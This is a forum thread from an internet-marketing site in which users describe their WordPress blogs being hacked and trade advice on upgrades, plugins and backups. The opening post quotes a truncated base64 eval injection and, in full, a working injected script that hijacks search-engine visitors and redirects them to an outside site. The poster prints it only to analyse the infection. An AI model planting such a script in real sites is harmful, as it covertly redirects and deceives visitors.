Go Back   WarriorForum - Internet Marketing Forums > The Warrior Forum > Main Internet Marketing Discussion Forum
Register Blogs FAQ Social Groups CalendarHelp Desk

Reply
 
LinkBack Thread Tools
Old 06-30-2009, 01:07 PM   #1
HyperActive Warrior
War Room Member
 
WendellC's Avatar
 
Join Date: Jan 2008
Location: Southern California
Posts: 190
Thanks: 9
Thanked 52 Times in 34 Posts
Social Networking View Member's Twitter Profile 
Default Do You Want To Join The Wordpress Hacked Club?

Yes, I'm now a sad member of that group.

Two of my WP sites have been hacked recently. Both on the same server, both old WP installs so I think there must be some kind of security loophole that got exploited.

1) The first hack injected some eval(base64_decode('aWYoZnVuY3 ... code at the top of EVERY php file. I tried to decode it all but it also uses gzdecode and goes very deep into the WP install.

On the bright(?) side it looks like the injected code got broken so it "only" disabled my site rather than run it's hack all the way through. My guess is it's probably some kind of redirect.

2) The second hack injected some script that is difficult to see within the WP php files. It's not in the higher level files like index.php so it's getting inserted at a lower level.

The only way I found out about it was my AVG detected a Exploit Search Engine Hijack when I navigated to the site and when I viewed the rendered source code I found this script:

<script> var r=document.referrer,t="",q; if(r.indexOf("google.")!=-1)t="q"; if(r.indexOf("msn.")!=-1)t="q"; if(r.indexOf("yahoo.")!=-1)t="p"; if(r.indexOf("altavista.")!=-1)t="q"; if(r.indexOf("aol.")!=-1)t="query"; if(r.indexOf("ask.")!=-1)t="q"; if(t.length&&((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)) window.location="http://maxifind.net/index.php?pf_id=361&q="+r.substring(q+2+t.length). split("&")[0]; </script>

We can see on that last line that it's a maxifind.net redirect. Feel free to boycott their site. Grrr!

I scanned my own PC and it didn't turn up any viruses so I don't think I have that iframe virus that has been floating around lately. I think I just got careless by keeping old WP installs that have security holes.

So be sure to keep your WP installs up-to-date and also have a good Wordpress backup and restore process in place.

Wendell

Get a free one-way link from No Opt In Required for your no opt-in product. PM for details.
Twitt..er...Me!
WendellC is offline   Reply With Quote
Old 06-30-2009, 02:10 PM   #2
HyperActive Warrior
War Room Member
 
VeitSchenk's Avatar
 
Join Date: Jun 2009
Location: Southern Germany
Posts: 469
Thanks: 213
Thanked 330 Times in 101 Posts
Social Networking View Member's FaceBook Profile  View Member's Twitter Profile 
Default Re: Do You Want To Join The Wordpress Hacked Club?

Wendell,

how old were your WP installs? I've got a few I haven't upgraded to 2.7 on purpose (compatibility issues with a few plugins...)

Cheers

Veit
VeitSchenk is offline   Reply With Quote
Old 06-30-2009, 02:15 PM   #3
Greg Schueler
War Room Member
 
VegasGreg's Avatar
 
Join Date: Jul 2002
Location: Las Vegas
Posts: 2,101
Thanks: 192
Thanked 398 Times in 292 Posts
Social Networking View Member's Twitter Profile 
Contact Info
Send a message via Yahoo to VegasGreg
Default Re: Do You Want To Join The Wordpress Hacked Club?

I too had 5-6 WP sites hacked 2 weeks ago. They simply replaced my index page with their "you've been hacked" video. It said that they were Muslim Extremist Hackers.

Some of the sites were brand new installs that I had not even finished yet and had not backed them up yet.

Greg Schueler - Wordpress Fanatic... Offline Marketing Rockstar...

VegasGreg is offline   Reply With Quote
Old 06-30-2009, 02:22 PM   #4
Warrior Member
 
Join Date: Jan 2009
Location: UK
Posts: 19
Thanks: 0
Thanked 0 Times in 0 Posts
Default Re: Do You Want To Join The Wordpress Hacked Club?

If those guys are that clever why don't they hack the Wordpress.org site, would like to see that.

PixelPerfect is offline   Reply With Quote
Old 06-30-2009, 02:28 PM   #5
always PM more info
War Room Member
 
Join Date: Jun 2009
Location: West Virginia
Posts: 82
Thanks: 10
Thanked 14 Times in 13 Posts
Contact Info
Send a message via AIM to twright
Default Re: Do You Want To Join The Wordpress Hacked Club?

they make a security plugin for WP, might want to gander at some of those.

keeps your eyes open, sometimes they do something simple so it appears like thats all they did.
twright is offline   Reply With Quote
Old 06-30-2009, 02:49 PM   #6
HyperActive Warrior
War Room Member
 
WendellC's Avatar
 
Join Date: Jan 2008
Location: Southern California
Posts: 190
Thanks: 9
Thanked 52 Times in 34 Posts
Social Networking View Member's Twitter Profile 
Default Re: Do You Want To Join The Wordpress Hacked Club?

Quote:
Originally Posted by VeitSchenk View Post
Wendell,

how old were your WP installs? I've got a few I haven't upgraded to 2.7 on purpose (compatibility issues with a few plugins...)

Cheers

Veit
Ah, I'm embarrassed to say it but it was version 2.04! I think it was the first WP blog I ever created and I forgot to upgrade it over the years. Most of my blogs are now in the 2.6 - 2.7 range. I just have to go back and get them all upgraded to something with a few less security holes...

Right now I'm trying to see if I can upgrade it without breaking the database. I tried to do an upgrade before on another WP site and it really screwed up the categories since WP at some point made some major changes to their schema.

I might just end up installing 2.8, reposting all my content manually and taking my lumps with the permalink differences...

*sigh*

Wendell

Get a free one-way link from No Opt In Required for your no opt-in product. PM for details.
Twitt..er...Me!
WendellC is offline   Reply With Quote
Old 06-30-2009, 03:05 PM   #7
Warrior Member
 
Join Date: Jun 2009
Posts: 16
Thanks: 2
Thanked 1 Time in 1 Post
Default Re: Do You Want To Join The Wordpress Hacked Club?

I have wordpress site, but didn't have such problems. Probably because I have only few visitors monthly.
kameleon is offline   Reply With Quote
Old 06-30-2009, 03:30 PM   #8
Active Warrior
 
JohnnyPhunk's Avatar
 
Join Date: Oct 2008
Posts: 32
Thanks: 0
Thanked 2 Times in 2 Posts
Default Re: Do You Want To Join The Wordpress Hacked Club?

Definitely gotta keep your WP up to date.

There's a security scan plugin that helps too.
JohnnyPhunk is offline   Reply With Quote
Old 06-30-2009, 03:40 PM   #9
HyperActive Warrior
 
Join Date: Aug 2008
Posts: 192
Thanks: 2
Thanked 13 Times in 13 Posts
Default Re: Do You Want To Join The Wordpress Hacked Club?

I used to use wordpress. It is a very powerful piece of blogging software but after being hacked myself i went back to go old fashioned HMTL and javascript. Also wordpress has a habit of running slow at peak times and my users were getting fed up of waiting 30 seconds for a page to load up. HTML is so fast because there is little code to slow the process down and it's the same with PHP.

Find Search Marketing Companies - Find Proven Search Marketing and SEO Experts Fast.
Local Pet Sitting Services
100+ Paid Survey Site Reviews
Electricity Bill Savings - Great Ways to save on your electricity bill
Paid Surveys is offline   Reply With Quote
Old 06-30-2009, 04:03 PM   #10
One Man Army
War Room Member
 
GuerrillaIM's Avatar
 
Join Date: Jul 2008
Location: London, UK
Posts: 1,889
Thanks: 93
Thanked 308 Times in 181 Posts
Default Re: Do You Want To Join The Wordpress Hacked Club?

I think a lot of WP blogs get hacked due to vulnerabilities in the plugins. Search for "plugin name + vulnerability" before installing to make sure its not a real mess and easy to hack.
GuerrillaIM is offline   Reply With Quote
Old 06-30-2009, 04:34 PM   #11
HyperActive Warrior
War Room Member
 
Join Date: Aug 2008
Posts: 247
Thanks: 291
Thanked 11 Times in 11 Posts
Default Re: Do You Want To Join The Wordpress Hacked Club?

I would like to hitch hike on this issue, by asking for advice on how to upgrade. I am a novice on wordpress and don't know how to upgrade it. I have it hosted on bluehost and can access the cpanel but after that I am stumped as what to do. Can anyone offer me any advice on what to do after I am on the cpanel? Thanks,
ed

edd666666 is offline   Reply With Quote
Old 06-30-2009, 04:51 PM   #12
SEO Expert & Author
War Room Member
 
JustaWizard's Avatar
 
Join Date: Feb 2007
Location: Vancouver, WA USA
Posts: 486
Thanks: 201
Thanked 57 Times in 31 Posts
Social Networking View Member's Twitter Profile 
Default Re: Do You Want To Join The Wordpress Hacked Club?

Quote:
Originally Posted by edd666666 View Post
I would like to hitch hike on this issue, by asking for advice on how to upgrade. I am a novice on wordpress and don't know how to upgrade it. I have it hosted on bluehost and can access the cpanel but after that I am stumped as what to do. Can anyone offer me any advice on what to do after I am on the cpanel? Thanks,
ed
Ed, at Bluehost cpanel, click on the Wordpress Icon, then click on "my installs" and you can upgrade from there. Alternately, you can go to your wordpress dashboard for that site, and near the top there should be an "upgrade to 2.8" link.

Best,
David

JustaWizard is offline   Reply With Quote
Old 06-30-2009, 04:58 PM   #13
SEO Expert & Author
War Room Member
 
JustaWizard's Avatar
 
Join Date: Feb 2007
Location: Vancouver, WA USA
Posts: 486
Thanks: 201
Thanked 57 Times in 31 Posts
Social Networking View Member's Twitter Profile 
Default Re: Do You Want To Join The Wordpress Hacked Club?

The oldest version of Wordpress I've ever used is 2.7.1 - but recently installing WP on a new site I installed 2.8 and had to delete the install because there was some kind of redirect to a link farm site. I suspect it was, ironically, a plugin named "redirect" because I deleted plugins one by one (at BlueHosts suggestion) until I isolated the offending plugin. Now I have 2.8 up and with all the plugins including "redirect" and things have been fine.

I guess that plugins and Wordpress are just vulnerable???

David

JustaWizard is offline   Reply With Quote
Old 06-30-2009, 05:19 PM   #14
TheRichJerksNet
Guest
 
Posts: n/a
Default Re: Do You Want To Join The Wordpress Hacked Club?

Mine have not been hacked.. I run v2. something, not going to say the version but it sure is not 2.7 or 2.8..

Its not the version that you run but the security you do on the site. You can NOT rely upon wordpress to secure your site.. You must take matters into your own hands and do it yourself...

The past five years has seen the popularity of blogs grow in their use and as a means of making money. That's the meat that computer hackers look to sink their teeth into. A recent report by the Congressional Research Service stated that the financial impact of computer hackers amounts to $226 billion annually. Another report calculated that hackers could be taking up to six cents of every Internet dollar of revenue.

Get used to it as it's life... Either that or secure your blog.. It is not always the plugins or the themes.

James
  Reply With Quote
Old 06-30-2009, 05:39 PM   #15
SEO Expert & Author
War Room Member
 
JustaWizard's Avatar
 
Join Date: Feb 2007
Location: Vancouver, WA USA
Posts: 486
Thanks: 201
Thanked 57 Times in 31 Posts
Social Networking View Member's Twitter Profile 
Default Re: Do You Want To Join The Wordpress Hacked Club?

Quote:
Originally Posted by TheRichJerksNet View Post
Mine have not been hacked.. I run v2. something, not going to say the version but it sure is not 2.7 or 2.8..

Its not the version that you run but the security you do on the site. You can NOT rely upon wordpress to secure your site.. You must take matters into your own hands and do it yourself...

The past five years has seen the popularity of blogs grow in their use and as a means of making money. That's the meat that computer hackers look to sink their teeth into. A recent report by the Congressional Research Service stated that the financial impact of computer hackers amounts to $226 billion annually. Another report calculated that hackers could be taking up to six cents of every Internet dollar of revenue.

Get used to it as it's life... Either that or secure your blog.. It is not always the plugins or the themes.

James
Hi James, how does one secure a blog, then? - is that something done in cpanel on bluehost, or does one need to purchase/install 3rd party software or script onto a file via FTP?

I admit I'm not green, but not a programmer-type either...

THANKS!
David

JustaWizard is offline   Reply With Quote
Old 06-30-2009, 05:59 PM   #16
TheRichJerksNet
Guest
 
Posts: n/a
Default Re: Do You Want To Join The Wordpress Hacked Club?

Quote:
Originally Posted by JustaWizard View Post
Hi James, how does one secure a blog, then? - is that something done in cpanel on bluehost, or does one need to purchase/install 3rd party software or script onto a file via FTP?

I admit I'm not green, but not a programmer-type either...

THANKS!
David
Sent you a PM David...

James
  Reply With Quote
Old 07-01-2009, 12:30 AM   #17
HyperActive Warrior
War Room Member
 
WendellC's Avatar
 
Join Date: Jan 2008
Location: Southern California
Posts: 190
Thanks: 9
Thanked 52 Times in 34 Posts
Social Networking View Member's Twitter Profile 
Default Re: Do You Want To Join The Wordpress Hacked Club?

Well, I decided to bite the bullet and just start fresh with a brand new 2.8 install. Too much infestation to try and patch up the old installation.

So...can anyone recommend a good WP plug-in that will help me to keep my future WP installs up to date?

Thanks -

Wendell

Get a free one-way link from No Opt In Required for your no opt-in product. PM for details.
Twitt..er...Me!
WendellC is offline   Reply With Quote
Old 07-01-2009, 12:36 AM   #18
formerly annoyedgirl
War Room Member
 
valerieSONORA's Avatar
 
Join Date: Nov 2007
Location: USA.
Posts: 1,337
Thanks: 161
Thanked 183 Times in 122 Posts
Social Networking View Member's FaceBook Profile  View Member's Twitter Profile 
Default Re: Do You Want To Join The Wordpress Hacked Club?

I think I was one of the very first members.

Don't be defined by someone else's opinion of you.
All I really need are minions.
فاليري
valerieSONORA is offline   Reply With Quote
Old 07-01-2009, 12:42 AM   #19
Senior Warrior Member
War Room Member
 
Tom Dean's Avatar
 
Join Date: Feb 2005
Location: Northeast Fl USA.
Posts: 1,608
Blog Entries: 2
Thanks: 18
Thanked 25 Times in 14 Posts
Social Networking View Member's FaceBook Profile  View Member's Twitter Profile 
Default Re: Do You Want To Join The Wordpress Hacked Club?

I had a "seasonal" blog hacked. Didn't notice for months since I rarely checked it until it was getting close to the season. Fortunately they just altered the index page. They got in through an unprotected folder as in - it had no index file.

Tom

Free Monthly PLR & More at The Dean Report

Instant Web Graphics

Tom Dean is offline   Reply With Quote
Old 07-01-2009, 12:44 AM   #20
Warrior Member
War Room Member
 
Join Date: May 2009
Posts: 20
Thanks: 4
Thanked 2 Times in 1 Post
Default Re: Do You Want To Join The Wordpress Hacked Club?

Once about 5 of my wp sites (which I wasn't updating for several months) were hacked by some saudi arabian hacker group. They defaced my front page and installed some malware which will get downloaded if you visit the page Google started showing warnings on searches as "Reported attack site". I was horrified when I saw this. (Stupid of me, I didnt even visit these sites for months).

They could hack because, i wasn't updating my wp or the plugins. After this lesson, I religiously update all my wordpress installations and plugins as soon as a new update is available. Love the admin panel upgrade option available in the newer versions of wordpress.
phantom76 is offline   Reply With Quote
Old 07-01-2009, 12:48 AM   #21
TheRichJerksNet
Guest
 
Posts: n/a
Default Re: Do You Want To Join The Wordpress Hacked Club?

Quote:
Originally Posted by clickguy View Post
Well, I decided to bite the bullet and just start fresh with a brand new 2.8 install. Too much infestation to try and patch up the old installation.

So...can anyone recommend a good WP plug-in that will help me to keep my future WP installs up to date?

Thanks -

Wendell
Yeah ... Do your own updates, do not use any plugins or auto updates - This includes the auto update that wordpress has. This is a huge security risk when you do.

Also do NOT update as soon as a new release is out, wait until it is stable.

James
  Reply With Quote
Old 07-01-2009, 12:59 AM   #22
Gleb
War Room Member
 
MemberWing's Avatar
 
Join Date: Dec 2008
Location: Ottawa, Canada
Posts: 845
Thanks: 10
Thanked 104 Times in 85 Posts
Social Networking View Member's Twitter Profile 
Contact Info
Send a message via Skype™ to MemberWing
Default Re: Do You Want To Join The Wordpress Hacked Club?

I second suggestion of not updating as soon as Wordpress releases next major update.
Wait few weeks until dust settles.
I.e:
*.*.Y - update is safe immediately.
*.Y - wait 2 weeks before applying.
Y.* - wait 4 weeks before applying.

Gleb

MemberWing is offline   Reply With Quote
Old 07-08-2009, 02:03 PM   #23
It's a "DRY" Heat
War Room Member
 
azsno's Avatar
 
Join Date: Mar 2007
Location: Arizona
Posts: 991
Thanks: 140
Thanked 117 Times in 61 Posts
Social Networking View Member's Twitter Profile  View Member's YouTube Profile
Contact Info
Send a message via Skype™ to azsno
Default Re: Do You Want To Join The Wordpress Hacked Club?

I've have a plugin that works easily with Wordpress, to Secure your BLOG...My WP-Padlock program secures Wordpress easily and quickly, and comes with installation video, and info on how to secure the vulnerabilities in Wordpress...

You can find the plugin in my signature below...

~AzSno...

P.S. If you're wondering about my credentials, I'm a former Network/Security Engineer in Silicon Valley. I'm certified with Cisco PIX, Checkpoint Firewalls, numerous IDS (Intrusion Detection Systems, and Nokia Firewalls and Security Devices...)...I've designed networks and security systems for eBay, Providian Financial Services, UC Berkeley, Lawrence Livermore Labs, and Cal State Hayward...Suffice it to say, I know a little about security...

azsno is offline   Reply With Quote
Old 03-29-2011, 04:33 PM   #24
HyperActive Warrior
 
Join Date: Feb 2010
Posts: 205
Thanks: 56
Thanked 60 Times in 56 Posts
Default Re: Do You Want To Join The Wordpress Hacked Club?

Just had 10 wordpress blogs Hacked.....
Just come up with standard wp them and say "HACKED BY ALI" all content gone.
classdancer is offline   Reply With Quote
Old 03-29-2011, 04:36 PM   #25
Gleb
War Room Member
 
MemberWing's Avatar
 
Join Date: Dec 2008
Location: Ottawa, Canada
Posts: 845
Thanks: 10
Thanked 104 Times in 85 Posts
Social Networking View Member's Twitter Profile 
Contact Info
Send a message via Skype™ to MemberWing
Default Re: Do You Want To Join The Wordpress Hacked Club?

to all clients that I build sites, I almost insist to include full blown, off-site, daily or weekly website backup, including all files and database.

...and of course to maintain plugins and wordpress upgrades.

Gleb

MemberWing is offline   Reply With Quote
Old 03-29-2011, 05:50 PM   #26
HyperActive Warrior
War Room Member
 
danemorgan's Avatar
 
Join Date: Mar 2004
Location: Missouri, USA.
Posts: 295
Blog Entries: 4
Thanks: 77
Thanked 46 Times in 33 Posts
Social Networking View Member's Twitter Profile 
Contact Info
Send a message via ICQ to danemorgan Send a message via Yahoo to danemorgan
Default Re: Do You Want To Join The Wordpress Hacked Club?

Quote:
Originally Posted by VeitSchenk View Post
Wendell,

how old were your WP installs? I've got a few I haven't upgraded to 2.7 on purpose (compatibility issues with a few plugins...)

Cheers

Veit
2.7 is extremely vulnerable with several DOZEN published exploits.

The thing is that zero day exploits really aren't that dangerous for folks like us that aren't national houshold names. But once these exploits are published there are forums out there very similar to this one, but with a different focus. People actually post exploits to help out the new script kiddies and sell them software to help them find and attack blogs just like yours.

Remember to put something useful here...
danemorgan is offline   Reply With Quote
Old 03-29-2011, 05:52 PM   #27
HyperActive Warrior
War Room Member
 
danemorgan's Avatar
 
Join Date: Mar 2004
Location: Missouri, USA.
Posts: 295
Blog Entries: 4
Thanks: 77
Thanked 46 Times in 33 Posts
Social Networking View Member's Twitter Profile 
Contact Info
Send a message via ICQ to danemorgan Send a message via Yahoo to danemorgan
Default Re: Do You Want To Join The Wordpress Hacked Club?

Quote:
Originally Posted by MemberWing View Post
to all clients that I build sites, I almost insist to include full blown, off-site, daily or weekly website backup, including all files and database.

...and of course to maintain plugins and wordpress upgrades.

Gleb
that's all well and good, but relly, by the time many hacks these days end up getting noticed your backups are compromised several months back.

These days and these kinds of hacks it is less about street cred and more about cash money. Most of the time, now, if you notice you have been hacked, the hack failed.

Remember to put something useful here...
danemorgan is offline   Reply With Quote
Old 03-29-2011, 05:59 PM   #28
HyperActive Warrior
War Room Member
 
danemorgan's Avatar
 
Join Date: Mar 2004
Location: Missouri, USA.
Posts: 295
Blog Entries: 4
Thanks: 77
Thanked 46 Times in 33 Posts
Social Networking View Member's Twitter Profile 
Contact Info
Send a message via ICQ to danemorgan Send a message via Yahoo to danemorgan
Default Re: Do You Want To Join The Wordpress Hacked Club?

The reason Wordpress seems insecure is the same reason Windows seems insecure.

Potential.

If you are going to write a script to inject code into something are you going to spend your time trying to attack a 1,000 user base or a 1,000,000 user base? The work is the same, the payoff is dramatically different.

A WordPress version is already being hacked at by hackers before most Wordpress users even know it exists.

Remember to put something useful here...
danemorgan is offline   Reply With Quote
Reply

  WarriorForum - Internet Marketing Forums > The Warrior Forum > Main Internet Marketing Discussion Forum

Tags
club, exploit, hacked, join, virus, wordpress

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off



All times are GMT -6. The time now is 04:10 PM.